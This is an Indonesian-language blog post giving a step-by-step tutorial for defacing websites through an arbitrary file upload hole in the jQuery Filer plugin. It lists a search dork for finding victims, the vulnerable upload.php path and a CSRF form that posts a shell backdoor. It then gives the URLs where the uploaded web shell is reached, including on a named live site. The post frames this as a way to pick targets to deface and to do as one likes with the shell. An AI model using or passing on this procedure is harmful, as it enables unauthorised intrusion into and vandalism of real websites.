Kamis, 25 Oktober 2018

Jquery Filer Arbitrary File Upload

Jquery Filer Arbitary File Upload.





Ok kita siapin bahan-bahanya dulu,
- Shell Backdoor
- Dork : inurl:/factoring-company-testimonials.html
- Exploit : /plugins/jquery.filer/php/upload.php
- CSRF : Klik here!

Ok langsung aja ea ke tutorial nya,

1. Dorking dulu

2. Pilih target kalian yang mau di deface

3. Masukin exploitnya, contoh : http://ventura-factoring-companies.ocf.com/plugins/jquery.filer/php/upload.php

4. Buka csrf nya mausakn url target nya dan isi post dataya dengan " files[] "

5. Lock!

6. Pilih shell kalian, lalu upload.

7. Jika vuln akan seperti ini

8. Lalu buka akses shell kalian :
    www.site.com/plugins/jquery.filer/uploads/shell.p.php
http://ventura-factoring-companies.ocf.com/plugins/jquery.filer/uploads/ex.p.php

9. Ok terserah mau di apakan shell nya ^_^

Ok sekian tutorial dari saya.

Thanks,

Lorem ipsum is simply dummy text of the printing and typesetting industry.

This Is The Oldest Page

7 comments


EmoticonEmoticon